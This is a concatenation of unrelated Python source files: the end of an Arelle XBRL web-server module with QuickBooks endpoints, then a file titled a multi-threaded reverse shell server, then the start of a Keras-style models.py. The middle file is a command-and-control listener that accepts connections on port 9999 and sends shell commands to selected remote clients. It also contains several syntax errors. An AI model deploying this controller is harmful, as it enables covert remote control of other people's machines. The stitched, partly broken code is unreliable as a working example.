os.kill(_os_pid, signal.SIGTERM)
thread = threading.Thread(target=lambda: stopSoon(2.5))
thread.daemon = True
thread.start()
response.content_type = 'text/html; charset=UTF-8'
return htmlBody(tableRows((time.strftime("Received at %Y-%m-%d %H:%M:%S"),
"Good bye...",),
header=_("Stop Request")))
def quickbooksServer():
"""Interface to QuickBooks server responding to *post* requests to */quickbooks/server.asmx*.
(Part of QuickBooks protocol, see module CntlrQuickBooks.)
"""
from arelle import CntlrQuickBooks
response.content_type = 'text/xml; charset=UTF-8'
return CntlrQuickBooks.server(cntlr, request.body, request.urlparts)
def quickbooksGLrequest(qbReport=None, file=None):
"""Initiate request to QuickBooks server for *get* requests to */rest/quickbooks/<qbReport>/xbrl-gl/...*.
:returns: html, xml, csv, text -- Return per media type argument and request arguments
"""
from arelle.CntlrQuickBooks import supportedQbReports, qbRequest
from arelle.ModelValue import dateTime
errors = []
requestPathParts = request.urlparts[2].split('/')
viewRequested = "view" == requestPathParts[-1]
media = request.query.media or 'html'
fromDate = request.query.fromDate
toDate = request.query.toDate
if qbReport not in supportedQbReports:
errors.append(_("QuickBooks report '{0}' is not supported (please select from: {1})").format(
qbReport, ', '.join(supportedQbReports)))
if media not in ('xml', 'xhtml', 'html'):
errors.append(_("Media '{0}' is not supported for xbrl-gl (please select xhtml, html or xml)").format(media))
if not fromDate or dateTime(fromDate) is None:
errors.append(_("FromDate '{0}' missing or not valid").format(fromDate))
if not toDate or dateTime(toDate) is None:
errors.append(_("ToDate '{0}' missing or not valid").format(toDate))
if errors:
return errorReport(errors, media)
ticket = qbRequest(qbReport, fromDate, toDate, file)
result = htmlBody(tableRows([_("Request queued for QuickBooks...")], header=_("Quickbooks Request")), script='''
<script type="text/javascript">
<!--
var timer = setInterval("autoRefresh()", 1000 * 10);
function autoRefresh(){{location.href = "/rest/quickbooks/response?ticket={0}&media={1}&view={2}";}}
//-->
</script>
'''.format(ticket, media, viewRequested))
return result
def quickbooksGLresponse():
"""Poll for QuickBooks protocol responses for *get* requests to */rest/quickbooks/response*.
:returns: html, xml, csv, text -- Return per media type argument and request arguments, if response is ready, otherwise javascript to requery this *get* request periodicially.
"""
from arelle import CntlrQuickBooks
ticket = request.query.ticket
media = request.query.media
viewRequested = request.query.view
status = CntlrQuickBooks.qbRequestStatus.get(ticket)
if not status:
return htmlBody(tableRows([_("QuickBooks ticket not found, request canceled.")], header=_("Quickbooks Request")))
if status.startswith("ConnectionErrorMessage: "):
CntlrQuickBooks.qbRequestStatus.pop(ticket, None)
return errorReport([status[24:]], media)
if status != "Done" or ticket not in CntlrQuickBooks.xbrlInstances:
return htmlBody(tableRows([_("{0}, Waiting 20 seconds...").format(status)],
header=_("Quickbooks Request")),
script='''
<script type="text/javascript">
<!--
var timer = setInterval("autoRefresh()", 1000 * 20);
function autoRefresh(){{clearInterval(timer);self.location.reload(true);}}
//-->
</script>
''')
CntlrQuickBooks.qbRequestStatus.pop(ticket)
instanceUuid = CntlrQuickBooks.xbrlInstances[ticket]
CntlrQuickBooks.xbrlInstances.pop(ticket)
options = Options()
setattr(options, "entrypointFile", instanceUuid)
viewFile = FileNamedStringIO(media)
setattr(options, "factsFile", viewFile)
return runOptionsAndGetResult(options, media, viewFile)
def quickbooksWebPage():
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">Arelle QuickBooks Global Ledger Interface</th></tr>
<tr><td>checkbox</td><td>Trial Balance.</td></tr>
<tr><td>close button</td><td>Done</td></tr>
</table>'''))
def localhostCertificate():
"""Interface to QuickBooks server responding to *get* requests for a host certificate */quickbooks/localhost.crt* or */localhost.crt*.
(Supports QuickBooks protocol.)
:returns: self-signed certificate
"""
return '''
-----BEGIN CERTIFICATE-----
MIIDljCCAn4CAQAwDQYJKoZIhvcNAQEEBQAwgZAxCzAJBgNVBAYTAlVTMRMwEQYD
VQQIEwpDYWxpZm9ybmlhMQ8wDQYDVQQHEwZFbmNpbm8xEzARBgNVBAoTCmFyZWxs
ZS5vcmcxDzANBgNVBAsTBmFyZWxsZTESMBAGA1UEAxMJbG9jYWxob3N0MSEwHwYJ
KoZIhvcNAQkBFhJzdXBwb3J0QGFyZWxsZS5vcmcwHhcNMTIwMTIwMDg0NjM1WhcN
MTQxMDE1MDg0NjM1WjCBkDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3Ju
aWExDzANBgNVBAcTBkVuY2lubzETMBEGA1UEChMKYXJlbGxlLm9yZzEPMA0GA1UE
CxMGYXJlbGxlMRIwEAYDVQQDEwlsb2NhbGhvc3QxITAfBgkqhkiG9w0BCQEWEnN1
cHBvcnRAYXJlbGxlLm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMJEq9zT4cdA2BII4TG4OJSlUP22xXqNAJdZZeB5rTIX4ePwIZ8KfFh/XWQ1/q5I
c/rkZ5TyC+SbEmQa/unvv1CypMAWWMfuguU6adOsxt+zFFMJndlE1lr3A2SBjHbD
vBGzGJJTivBzDPBIQ0SGcf32usOeotmE2PA11c5en8/IsRXm9+TA/W1xL60mfphW
9PIaJ+WF9rRROjKXVdQZTRFsNRs/Ag8o3jWEyWYCwR97+XkorYsAJs2TE/4zV+8f
8wKuhOrsy9KYFZz2piVWaEC0hbtDwX1CqN+1oDHq2bYqLygUSD/LbgK1lxM3ciVy
ewracPVHBErPlcJFxiOxAw0CAwEAATANBgkqhkiG9w0BAQQFAAOCAQEAM2np3UVY
6g14oeV0Z32Gn04+r6FV2D2bobxCVLIQDsWGEv1OkjVBJTu0bLsZQuNVZHEn5a+2
I0+MGME3HK1rx1c8MrAsr5u7ZLMNj7cjjtFWAUp9GugJyOmGK136o4/j1umtBojB
iVPvHsAvwZuommfME+AaBE/aJjPy5I3bSu8x65o1fuJPycrSeLAnLd/shCiZ31xF
QnJ9IaIU1HOusplC13A0tKhmRMGNz9v+Vqdj7J/kpdTH7FNMulrJTv/0ezTPjaOB
QhpLdqly7hWJ23blbQQv4ILT2CiPDotJslcKDT7GzvPoDu6rIs2MpsB/4RDYejYU
+3cu//C8LvhjkQ==
-----END CERTIFICATE-----
'''
def helpREST():
"""Help web page for *get* requests to */help*.
:returns: html - Table of CntlrWebMain web API
"""
return htmlBody(_('''<table>
<tr><th colspan="2">Arelle web API</th></tr>
<tr><td>/help</td><td>This web page.</td></tr>
<tr><td>/about</td><td>About web page, copyrights, etc.</td></tr>
<tr><th colspan="2">Validation</th></tr>
<tr><td>/rest/xbrl/{file}/validation/xbrl</td><td>Validate document at {file}.</td></tr>
''') +
(_('''
<tr><td>\u00A0</td><td>For an http POST of a zip file (mime type application/zip), {file} is the relative file path inside the zip file.</td></tr>
<tr><td>\u00A0</td><td>For an http GET request, {file} may be a web url, and may have "/" characters replaced by ";" characters
(but that is not necessary).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c.xbrl/validation/xbrl?media=xml</code>: Validate entry instance
document in the POSTed zip archived file c.xbrl and return structured xml results.</td></tr>
<tr><td>/rest/xbrl/validation</td><td>(Alternative syntax) Validate document, file is provided as a parameter (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/validation?file=c.xbrl&media=xml</code>: Validate entry instance
document c.xbrl (in POSTed zip) and return structured xml results.</td></tr>
''')
if cntlr.isGAE else
_('''
<tr><td>\u00A0</td><td>For a browser request or http GET request, {file} may be local or web url, and may have "/" characters replaced by ";" characters
(but that is not necessary).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c:/a/b/c.xbrl/validation/xbrl?media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
<tr><td>\u00A0</td><td>For an http POST of a zip file (mime type application/zip), {file} is the relative file path inside the zip file.</td></tr>
<tr><td>/rest/xbrl/validation</td><td>(Alternative syntax) Validate document, file is provided as a parameter (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/validation?file=c:/a/b/c.xbrl&media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
''')) +
_('''
<tr><td></td><td>Parameters are optional after "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">flavor</td><td><code>standard</code>: XBRL 2.1 and XDT validation. (If formulas are present they will also be compiled and run.) (default)
<br/>{<code>sec</code>*|<code>edgar</code>*}: SEC Edgar Filer Manual validation. (If formulas are present they will also be compiled and run.)
<br/><code>standard-except-formula</code>: XBRL 2.1 and XDT validation. (If formulas are present they will be ignored.)
<br/><code>formula-compile-only</code>: Formulas will be compiled but not run. (No XBRL 2.1, XDT, or disclosure system validation.)
<br/><code>formula-compile-and-run</code>: Formulas will be compiled and run. (No XBRL 2.1, XDT, or disclosure system validation.)</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>json</code>: JSON results.
<br/><code>text</code>: Plain text results (no markup).</td></tr>
<tr><td style="text-indent: 1em;">file</td><td>Alternate way to specify file name or url by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">import</td><td>A list of files to import to the DTS, such as additional formula
or label linkbases. Multiple file names are separated by a '|' character.</td></tr>
<tr><td style="text-indent: 1em;">labelLang</td><td>Label language to override system settings, e.g., <code>&labelLang=ja</code>.</td></tr>
<tr><td style="text-indent: 1em;">labelRole</td><td>Label role instead of standard label, e.g., <code>&labelRole=http://www.xbrl.org/2003/role/verboseLabel</code>. To use the concept QName instead of a label, specify <code>&labelRole=XBRL-concept-name</code>.</td></tr>
<tr><td style="text-indent: 1em;">uiLang</td><td>User interface language to override system settings, e.g., <code>&uiLang=fr</code>. Changes setting for current session (but not saved setting).</td></tr>
<tr><td style="text-indent: 1em;">calcDecimals</td><td>Specify calculation linkbase validation inferring decimals.</td></tr>
<tr><td style="text-indent: 1em;">calcPrecision</td><td>Specify calculation linkbase validation inferring precision.</td></tr>
<tr><td style="text-indent: 1em;">efm-*</td><td>Select Edgar Filer Manual (U.S. SEC) disclosure system validation. (Alternative to flavor parameter.):<br/>
<code>efm-pragmatic</code>: SEC-required rules, currently-allowed years<br/>
<code>efm-strict</code>: SEC-semantic additional rules, currently-allowed years<br/>
<code>efm-pragmatic-all-years</code>: SEC-required rules, all years<br/>
<code>efm-strict-all-years</code>: SEC-semantic additional rules, all years</td></tr>
<tr><td style="text-indent: 1em;">ifrs</td><td>Specify IFRS Global Filer Manual validation.</td></tr>
<tr><td style="text-indent: 1em;">hmrc</td><td>Specify HMRC validation.</td></tr>
<tr><td style="text-indent: 1em;">sbr-nl</td><td>Specify SBR-NL taxonomy validation.</td></tr>
<tr><td style="text-indent: 1em;">utr</td><td>Select validation with respect to Unit Type Registry.</td></tr>
<tr><td style="text-indent: 1em;">infoset</td><td>Select validation with respect to testcase infoset.</td></tr>
<tr><td style="text-indent: 1em;">parameters</td><td>Specify parameters for validation or formula (comma separated name=value[,name2=value2]).</td></tr>
<tr><td style="text-indent: 1em;">formulaAsserResultCounts</td><td>Report formula assertion counts.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarSetExprResult</td><td>Trace variable set formula value, assertion test results.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarSetTiming</td><td>Trace variable set execution times.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarFilterWinnowing</td><td>Trace variable set filter winnowing.</td></tr>
<tr><td style="text-indent: 1em;">{other}</td><td>Other detailed formula trace parameters:<br/>
formulaParamExprResult, formulaParamInputValue, formulaCallExprSource, formulaCallExprCode, formulaCallExprEval,
formulaCallExprResult, formulaVarSetExprEval, formulaFormulaRules, formulaVarsOrder,
formulaVarExpressionSource, formulaVarExpressionCode, formulaVarExpressionEvaluation, formulaVarExpressionResult, formulaVarFiltersResult, and formulaRunIDs.
</td></tr>
<tr><td style="text-indent: 1em;">abortOnMajorError</td><td>Abort process on major error, such as when load is unable to find an entry or discovered file.</td></tr>
<tr><td style="text-indent: 1em;">collectProfileStats</td><td>Collect profile statistics, such as timing of validation activities and formulae.</td></tr>
<tr><td style="text-indent: 1em;">plugins</td><td>Activate plug-ins, specify '|' separated .py modules (relative to plug-in directory).</td></tr>
<tr><td style="text-indent: 1em;">packages</td><td>Activate taxonomy packages, specify '|' separated .zip packages (absolute URLs or file paths).</td></tr>
<tr><th colspan="2">Versioning Report (diff of two DTSes)</th></tr>
<tr><td>/rest/xbrl/diff</td><td>Diff two DTSes, producing an XBRL versioning report relative to report directory.</td></tr>
<tr><td></td><td>Parameters are requred "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">fromDTS</td><td>File name or url of from DTS.</td></tr>
<tr><td style="text-indent: 1em;">toDTS</td><td>File name or url of to DTS.</td></tr>
<tr><td style="text-indent: 1em;">report</td><td>File name or url of to report (to for relative path construction). The report is not written out, but its contents are returned by the web request to be saved by the requestor.</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/diff?fromDTS=c:/a/prev/old.xsd&toDTS=c:/a/next/new.xsd&report=c:/a/report/report.xml</code>: Diff two DTSes and produce versioning report.</td></tr>
<tr><th colspan="2">Views</th></tr>
<tr><td>/rest/xbrl/{file}/{view}</td><td>View document at {file}.</td></tr>
<tr><td>\u00A0</td><td>{file} may be local or web url, and may have "/" characters replaced by ";" characters (but that is not necessary).</td></tr>
<tr><td>\u00A0</td><td>{view} may be <code>DTS</code>, <code>concepts</code>, <code>pre</code>, <code>cal</code>, <code>dim</code>, <code>facts</code>, <code>factTable</code>, <code>formulae</code>, <code>roleTypes</code>, or <code>arcroleTypes</code>.</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c:/a/b/c.xbrl/dim?media=html</code>: View dimensions of
document at c:/a/b/c.xbrl (on local drive) and return html result.</td></tr>
<tr><td>/rest/xbrl/view</td><td>(Alternative syntax) View document, file and view are provided as parameters (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/view?file=c:/a/b/c.xbrl&view=dim&media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
<tr><td></td><td>Parameters are optional after "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>csv</code>: CSV text results (no markup).
<br/><code>json</code>: JSON text results.</td></tr>
<tr><td style="text-indent: 1em;">file</td><td>Alternate way to specify file name or url by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">view</td><td>Alternate way to specify view by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">viewArcrole</td><td>Alternate way to specify view by indicating arcrole desired.</td></tr>
<tr><td style="text-indent: 1em;">import</td><td>A list of files to import to the DTS, such as additional formula
or label linkbases. Multiple file names are separated by a '|' character.</td></tr>
<tr><td style="text-indent: 1em;">factListCols</td><td>A list of column names for facts list. Multiple names are separated by a space or comma characters.
Example: <code>factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions</code></td></tr>
<tr><th colspan="2">Excel interface</th></tr>
<tr><td>GUI operation:</td><td>Select data tab.<br/>Click Get External Data From Web.<br/>
New Web Query dialog, enter rest URI to Address (example, for instance with indicated fact columns:
<code>http://localhost:8080/rest/xbrl/C:/Users/John Doe/Documents/eu/instance.xbrl/facts?media=xhtml&factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions</code><br/>
Before clicking Go, click Options, on Options dialog select Full HTML Formatting, then Ok to Options dialog.<br/>
Click Go.<br/>
Click arrow to select table.<br/>
Click Import button.<br/>
Review insertion cell, click ok on Import Data dialog.</td></tr>
<tr><td>VBA macro:</td><td>
<code>With ActiveSheet.QueryTables.Add(Connection:= _<br/>
"URL;http://localhost:8080/rest/xbrl/C:/Users/John Doe/Documents/eu/instance.xbrl/facts?media=xhtml&factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions" _<br/>
, Destination:=Range("$A$1"))<br/>
.Name = "facts"<br/>
.FieldNames = True<br/>
.RowNumbers = False<br/>
.FillAdjacentFormulas = False<br/>
.PreserveFormatting = False<br/>
.RefreshOnFileOpen = False<br/>
.BackgroundQuery = True<br/>
.RefreshStyle = xlInsertDeleteCells<br/>
.SavePassword = False<br/>
.SaveData = True<br/>
.AdjustColumnWidth = True<br/>
.RefreshPeriod = 0<br/>
.WebSelectionType = xlAllTables<br/>
.WebFormatting = xlWebFormattingAll<br/>
.WebPreFormattedTextToColumns = True<br/>
.WebConsecutiveDelimitersAsOne = True<br/>
.WebSingleBlockTextImport = False<br/>
.WebDisableDateRecognition = False<br/>
.WebDisableRedirections = False<br/>
.Refresh BackgroundQuery:=False<br/>
End With</code></td></tr>
<tr><th colspan="2">QuickBooks interface</th></tr>
<tr><td>Setup:</td><td>Install QuickBooks Web Connector by <a href="http://marketplace.intuit.com/webconnector/" target="installWBWC">clicking here</a>.<br/>
Click on QuickBooks.qwc in the Program Files Arelle directory, to install web connector for Arelle. (It specifies localhost:8080 in it.)<br/>
Open your QuickBooks and desired company<br/>
From start menu, programs, QuickBooks, start Web Connector (QBWC). Web connector may want a password, use any string, such as "abcd", as it's not checked at this time.<br/>
Start Arelle web server (if it wasn't already running)<br/>
To request xbrl-gl, select report type (generalLedger, journal, or trialBalance) and specify file name for xbrl-gl output instance.<br/>
QBWC polls once a minute, if impatient, in the QBWC window, click its Arelle checkbox and press the update button.<br/>
(If you get the error [8004041A] from Quickbooks, enable the company file for Arelle access in
Quickbooks: Edit->Preferences...->Integrated Applications->Company Preferences->click allow web access for ArelleWebService)<br/>
</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>http://localhost:8080/rest/quickbooks/generalLedger/xbrl-gl/C:/mystuff/xbrlGeneralLedger.xbrl/view?fromDate=2011-01-01&toDate=2011-12-31</code>
(You may omit <code>/view</code>.)</td></tr>
<tr><td></td><td>Parameters follow "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>json</code>: JSON results.
<br/><code>text</code>: Plain text results (no markup).</td></tr>
<tr><td style="text-indent: 1em;">fromDate, toDate</td><td>From & to dates for GL transactions</td></tr>
<tr><th colspan="2">Management</th></tr>
<tr><td>/rest/configure</td><td>Configure settings:</td></tr>
<tr><td></td><td>Parameters are required following "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">proxy</td><td>Show or modify and re-save proxy settings:<br/>
Enter 'show' to view current setting, 'system' to configure to use system proxy setting, 'none' to configure for no proxy, or 'http://[user[:password]@]host[:port]' (e.g., http://192.168.1.253, http://example.com:8080, http://joe:secret@example.com:8080)." ))
</td></tr>
<tr><td style="text-indent: 1em;">plugins</td><td>Show or modify and re-save plug-ins configuration:<br/>
Enter 'show' to view plug-ins configuration, , or '|' separated modules:
+url to add plug-in by its url or filename (relative to plug-in directory else absolute), ~name to reload a plug-in by its name, -name to remove a plug-in by its name,
(e.g., '+http://arelle.org/files/hello_web.py', '+C:\Program Files\Arelle\examples\plugin\hello_dolly.py' to load,
~Hello Dolly to reload, -Hello Dolly to remove). (Note that plug-ins are transient on Google App Engine, specify with &plugins to other rest commands.)
</td></tr>
<tr><td style="text-indent: 1em;">packages</td><td>Show or modify and re-save taxonomy packages configuration:<br/>
Enter 'show' to view packages configuration, , or '|' separated package URLs:
+url to add package by its full url or filename, ~name to reload a package by its name, -name to remove a package by its name.
(Note that packages are transient on Google App Engine, specify with &packages to other rest commands.)
</td></tr>
<tr><td style="text-indent: 1em;">environment</td><td>Show host environment (config and cache directories).</td></tr>
''') +
(_('''
<tr><td>/rest/stopWebServer</td><td>Shut down (terminate process after 2.5 seconds delay).</td></tr>
''') if cntlr.isGAE else '') +
'</table>')
def about(arelleImgFile=None):
from lxml import etree
"""About web page for *get* requests to */about*.
:returns: html - About web page
"""
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">About arelle</th></tr>
<tr><td rowspan="12" style="vertical-align:top;"><img src="%s"/></td><td>arelle® version: %s %sbit %s. An open source XBRL platform</td></tr>
<tr><td>© 2010-2015 Mark V Systems Limited. All rights reserved.</td></tr>
<tr><td>Web site: <a href="http://www.arelle.org">http://www.arelle.org</a>.
E-mail support: <a href="mailto:support@arelle.org">support@arelle.org</a>.</td></tr>
<tr><td>Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file
except in compliance with the License. You may obtain a copy of the License at
<a href="http://www.apache.org/licenses/LICENSE-2.0">http://www.apache.org/licenses/LICENSE-2.0</a>.
Unless required by applicable law or agreed to in writing, software distributed under the License
is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.</td></tr>
<tr><td>Includes:</td><tr>
<tr><td style="text-indent: 2.0em;">Python® %s.%s.%s © 2001-2010 Python Software Foundation</td></tr>
<tr><td style="text-indent: 2.0em;">PyParsing © 2003-2010 Paul T. McGuire</td></tr>
<tr><td style="text-indent: 2.0em;">lxml %s.%s.%s © 2004 Infrae, ElementTree © 1999-2004 by Fredrik Lundh</td></tr>
<tr><td style="text-indent: 2.0em;">xlrd © 2005-2013 Stephen J. Machin, Lingfo Pty Ltd, © 2001 D. Giffin, © 2000 A. Khan</td></tr>
<tr><td style="text-indent: 2.0em;">xlwt © 2007 Stephen J. Machin, Lingfo Pty Ltd, © 2005 R. V. Kiseliov</td></tr>
<tr><td style="text-indent: 2.0em;">Bottle © 2011 Marcel Hellkamp</td></tr>
</table>''') % (arelleImgFile or '/images/arelle32.gif',
cntlr.__version__,
cntlr.systemWordSize,
Version.version,
sys.version_info[0],sys.version_info[1],sys.version_info[2],
etree.LXML_VERSION[0],etree.LXML_VERSION[1],etree.LXML_VERSION[2]) )
def indexPageREST():
"""Index (default) web page for *get* requests to */*.
:returns: html - Web page of choices to navigate to */help* or */about*.
"""
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">Arelle Web Services</th></tr>
<tr><td>/help</td><td>Help web page, web services API.</td></tr>
<tr><td>/about</td><td>About web page, copyrights, license, included software.</td></tr>
</table>'''))
def indexPageCGI():
"""Default web page response for *get* CGI request with no parameters.
:returns: html - Web page of choices to navigate to *?help* or *?about*.
"""
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">Arelle CGI Services</th></tr>
<tr><td>?help</td><td>Help web page, CGI services.</td></tr>
<tr><td>?about</td><td>About web page, copyrights, license, included software.</td></tr>
<tr><td>REST API</td><td>The Arelle REST API is supported through CGI if the entire CGI path is wildcard-mapped to the arelleCmdLine executable.</td></tr>
</table>'''))
def htmlBody(body, script=""):
"""Wraps body html string in a css-styled html web page
:param body: Contents for the *<body>* element
:type body: html str
:param script: Script to insert in generated html web page (such as a timed reload script)
:type script: javascript str
:returns: html - Web page of choices to navigate to */help* or */about*.
"""
return '''
<?xml version="1.0" encoding="utf-8"?>
<html xmlns="http://www.w3.org/1999/xhtml">
%s <head>
<STYLE type="text/css">
body, table, p {font-family:Arial,sans-serif;font-size:10pt;}
table {vertical-align:top;white-space:normal;}
th {{background:#eee;}}
td {vertical-align:top;}
.tableHdr{border-top:.5pt solid windowtext;border-right:none;border-bottom:none;border-left:.5pt solid windowtext;}
.cell{border-top:1.0pt solid windowtext;border-right:.5pt solid windowtext;border-bottom:.5pt solid windowtext;border-left:.5pt solid windowtext;}
.blockedCell{border-top:1.0pt solid windowtext;border-right:.5pt solid windowtext;border-bottom:.5pt solid windowtext;border-left:.5pt solid windowtext;background:#eee;}
</STYLE>
</head>
<body>
%s
</body>
</html>
''' % (script, body)
def tableRows(lines, header=None):
"""Wraps lines of text into a one-column table (for display of text results of operations, such as processing messages and status, to web browser).
Replaces any *&* with *&* and *<* with *<*.
:param lines: Sequence (list or tuple) of line strings.
:type lines: [str]
:param header: Optional header text for top row of table.
:type header: str
:returns: html - <table> html string.
"""
return '<table cellspacing="0" cellpadding="4">%s\n</table>' % (
("<tr><th>%s</th></tr>" % header if header else "") +
"\n".join("<tr><td>%s</td></tr>" % line.replace("&","&").replace("<","<") for line in lines))
def errorReport(errors, media="html"):
"""Wraps lines of error text into specified media type for return of result to a request.
:param errors: Sequence (list or tuple) of error strings.
:type errors: [str]
:param media: Type of result requestd.
:type media: str
:returns: html - <table> html string.
"""
if media == "text":
response.content_type = 'text/plain; charset=UTF-8'
return '\n'.join(errors)
else:
response.content_type = 'text/html; charset=UTF-8'
return htmlBody(tableRows(errors, header=_("Messages")))
def multipartResponse(parts):
# call with ( (filename, contentType, content), ...)
boundary='----multipart-boundary-%s----' % (uuid.uuid1(),)
response.content_type = 'multipart/mixed; boundary=%s' % (boundary,)
buf = []
for filename, contentType, content in parts:
buf.append("\r\n" + boundary + "\r\n")
buf.append('Content-Disposition: attachment; filename="{0}";\r\n'.format(filename))
buf.append('Content-Type: {0};\r\n'.format(contentType))
buf.append('Content-Length: {0}\r\n'.format(len(content)))
buf.append('\r\n')
buf.append(content)
buf.append("\r\n" + boundary + "\r\n")
s = ''.join(buf)
response.content_length = len(s)
return s
|
server.py | # Python3 Multi-Threaded Reverse Shell - Server.py
import socket
import threading
import sys
import time
from queue import Queue
# Setup threading
NUMBER_OF_THREADS = 2
JOB_ID = [1, 2]
queue = Queue()
all_connections = []
all_addresses = []
# Create socket
def socket_create():
try:
global host
global port
global s
host = ''
port = 9999
s = socket.socket()
except socket.error as msg:
print("Socket Creation Error: " + str(msg))
# Bind socket to port and wait for connection
def socket_bind():
try:
global host
global port
global s
print("Binding to Port " + str(port))
s.bind((host, port))
s.listen(5) # Number of Bad Connections to Allow before Refusing
except socket.error as msg:
print("Socket Binding Error: " + str(msg) + "\nRetrying...")
time.sleep(3)
socket_bind()
# Accept connections for multiple clients
def accept_connections():
# Clean up old connections before starting
for c in all_connections:
c.close()
del all_connections[:]
del all_addresses[:]
while 1:
try:
conn, address = s.accept()
conn.setblocking(1) # Do not timeout
all_connections.append(conn)
all_addresses.append(address)
print("\nConnection Established: " + address[0])
except:
print("Error accepting connections")
# Interactive prompt for remote sessions
def start_shell():
while 1:
cmd = input("remote> ")
if == "list":
list_connections()
elif "select" in cmd:
conn = get_connection(cmd)
if conn is not None:
send_shell_commands(conn)
else:
print("Command Not Found...")
# Print a list of active connections
def list_connections():
results = ''
for i, conn in enumerate(all_connections):
try:
conn.send(str.encode(''))
conn.recv(20480)
except: # If a connection fails, remove it
del all_connections[i]
del all_addresses[i]
continue
results += str(i) + " " + str(all_addresses[i][0]) + " " + str(all_addresses[i][1]) + '\n'
print("----- Remote Clients -----" + "\n" + results)
# Select a connection returned by list_connections()
def get_connection(cmd):
try:
target = cmd.replace("select ", "")
target = int(target)
conn = all_connections[target] # Connect to the selected clients
print("Now Connected: " + str(all_addresses[target][0]))
print(str(all_addresses[target][0] + "> ", end=""))
return conn
except:
print("Invalid Client")
return None
# Pass commands to the client
def send_shell_commands(conn):
while 1:
try:
cmd = input()
if len(str.encode(cmd)) > 0:
conn.send(str.encode(cmd))
client_response = str(conn.recv(20480), "utf-8")
print(client_response, end="")
if cmd == "quit" || cmd == "exit"
break
except:
print("Connection Lost")
break
# Setup worker threads
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True # Kill the thread when the program exits
t.start()
# Do the next job in the queue
def work():
while 1:
x = queue.get()
if x == 1:
socket_create()
socket_bind()
accept_connections()
if x == 2:
start_shell()
queue.task_done()
# Create jobs
def create_jobs():
for x in JOB_ID:
queue.put(x)
queue.join
# Doooo it
create_workers()
create_jobs() |
models.py | from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import warnings
import pprint
from six.moves import range
import six
import time
import threading
try:
import queue
except ImportError:
import Queue as queue
from . import backend as K
from . import optimizers
from . import objectives
from . import callbacks as cbks
from .utils.layer_utils import container_from_config
from .utils.layer_utils import model_summary
from .utils.generic_utils import Progbar
from .layers import containers
def standardize_y(y):
if not hasattr(y, 'shape'):
y = np.asarray(y)
if len(y.shape) == 1:
y = np.expand_dims(y, 1)
return y
def batch_shuffle(index_array, batch_size):
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def make_batches(size, batch_size):
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size)) for i in range(0, nb_batch)]
def standardize_X(X):
if type(X) == list:
return X
else:
return [X]
def slice_X(X, start=None, stop=None):
'''
'''
if type(X) == list:
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in X]
else:
return [x[start:stop] for x in X]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return X[start]
else:
return X[start:stop]
def weighted_objective(fn):
def weighted(y_true, y_pred, weights, mask=None):
'''
'''
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
